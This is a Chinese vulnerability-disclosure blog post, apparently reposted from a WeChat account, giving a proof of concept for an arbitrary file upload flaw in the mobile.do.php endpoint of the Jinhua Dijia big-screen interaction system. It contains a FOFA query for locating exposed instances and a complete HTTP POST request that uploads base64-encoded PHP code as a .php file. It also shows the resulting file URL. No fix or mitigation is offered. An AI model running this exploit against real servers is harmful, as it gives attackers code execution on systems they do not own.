金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞 附POC

admin 2024年11月5日14:17:26评论14 views字数 850阅读2分50秒阅读模式

1. 金华迪加现场大屏互动系统简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

金华迪加现场大屏互动系统

2.漏洞描述

金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

金华迪加现场大屏互动系统

金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞 附POC
金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞

4.fofa查询语句

body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"

5.漏洞复现

漏洞链接:https://xx.xx.xx.xx/mobile/mobile.do.php?action=msg_uploadimg

漏洞数据包:

POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Host: xx.x.xx.xxx
Content-Length: 71
Content-Type: application/x-www-form-urlencoded

filetype=php&imgbase64=PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4=

会返回上传文件地址,其中PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4= 是 的base64编码

金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞 附POC

https://xxx.x.xx.xx/data/pic/pic_173072510494711.php

金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞 附POC

 

原文始发于微信公众号(南风漏洞复现文库):金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞 附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月5日14:17:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金华迪加现场大屏互动系统mobile.do.php接口存在任意文件上传漏洞 附POChttps://cn-sec.com/archives/3355605.html

发表评论

匿名网友 填写信息